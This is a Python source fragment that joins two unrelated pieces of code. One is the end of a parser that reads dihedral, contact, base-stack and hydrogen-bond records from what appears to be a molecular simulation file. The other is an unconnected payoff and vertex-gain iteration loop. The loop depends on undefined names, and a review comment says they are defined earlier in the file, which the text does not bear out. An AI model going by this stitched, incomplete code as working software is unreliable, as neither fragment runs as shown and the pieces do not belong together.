            ni.dihedrals.append(line2dihedral(line))
        elif line[0:7] == 'contact':
            ni.contacts.append(line2contact(line))
        elif line[0:2] == 'LJ':
            ni.contacts.append(line2LJ(line))
        elif line[0:9] == 'basestack':
            ni.basestacks.append(line2basestack(line))
        elif line[0:8] == 'basepair':
            ni.basepairs.append(line2basepair(line))

    ''' bs-dist (BaseStackDT) '''
    self._file.seek(0)
    for line in self._file:
        if line[0:7] == 'bs-dist':
            ni.basestackDTs.append(line2basestackDT(line))

    # bs-dihd lines carry a trailing type token (with_type=True).
    _scan('bs-dihd', ni.basestackDTs, ('dih1', 'dih2'), DIH_INTS, True,
          'Error dih1 and dih2 are occupied')

    # check
    for bs in ni.basestackDTs:
        if bs.dih1_id is None or bs.dih2_id is None:
            print('Error dih1 and/or dih2 is empty')
            sys.exit(2)  # was sys.eixt(2): AttributeError instead of exiting

    ''' tbs-dist (TertiaryStackDT) '''
    self._file.seek(0)
    for line in self._file:
        if line[0:8] == 'tbs-dist':
            ni.tertiarystackDTs.append(line2tertiarystackDT(line))

    _scan('tbs-angl', ni.tertiarystackDTs, ('ang1', 'ang2'), ANG_INTS, False,
          'Error ang1 and ang2 are occupied')
    _scan('tbs-dihd', ni.tertiarystackDTs, ('dih0', 'dih1', 'dih2'),
          DIH_INTS, False, 'Error dih1 and dih2 are occupied')

    # check
    for bs in ni.tertiarystackDTs:
        if (bs.ang1_id is None or bs.ang2_id is None or bs.dih0_id is None
                or bs.dih1_id is None or bs.dih2_id is None):
            print('Error ang1 and/or ang2 and/or dih1 and/or dih2 is empty')
            sys.exit(2)  # was sys.eixt(2)

    ''' hb-dist (HBondDT) '''
    self._file.seek(0)
    for line in self._file:
        if line[0:7] == 'hb-dist':
            ni.hbondDTs.append(line2hbondDT(line))

    _scan('hb-angl', ni.hbondDTs, ('ang1', 'ang2'), ANG_INTS, False,
          'Error ang1 and ang2 are occupied')
    _scan('hb-dihd', ni.hbondDTs, ('dih0', 'dih1', 'dih2'), DIH_INTS, False,
          'Error dih0 and dih1 and dih2 are occupied')

    # check
    for hb in ni.hbondDTs:
        if (hb.ang1_id is None or hb.ang2_id is None or hb.dih0_id is None
                or hb.dih1_id is None or hb.dih2_id is None):
            print('Error ang1 and/or ang2 and/or dih0 and/or dih1 and/or dih2 is empty')
            sys.exit(2)  # was sys.eixt(2)
# NOTE(review): this fragment relies on names defined earlier in the file
# (s, vertex_payoff, iterations, vg_old, angle_old, utils, np) — it appears
# to be the monitoring tail of an iterative payoff/vertex-gain update loop;
# confirm the surrounding definitions before further changes.
payoff_old = -10**8            # sentinel: any real payoff must exceed this
angle_decrease_iterations = 0
vgs_l = []                     # history of total vertex gain per iteration
for i in range(iterations):
    payoff = s.dot(vertex_payoff)
    # Positive part of the excess payoff per vertex.
    vertex_gain = np.where((vertex_payoff - payoff) > 0,
                           vertex_payoff - payoff, 0)
    # Invariant: total vertex gain (vg) must be non-increasing over time.
    vg = vertex_gain.sum()
    if vg > vg_old:
        print(i, 'vg increases, and that is wrong!')
        sys.exit(1)
    # Invariant: payoff must be non-decreasing over time.
    if payoff < payoff_old:
        print(i, 'payoff decreases, and that is wrong!')
        sys.exit(1)            # was sys.eixt(1): AttributeError, not an exit
    angle = utils.vector_angle(s, vertex_gain)
    if angle > angle_old and i > 0:
        angle_decrease_iterations += 1
    payoff_old = payoff
    angle_old = angle
    vg_old = vg                # same value as vertex_gain.sum(), hoisted
    vgs_l.append(vg_old)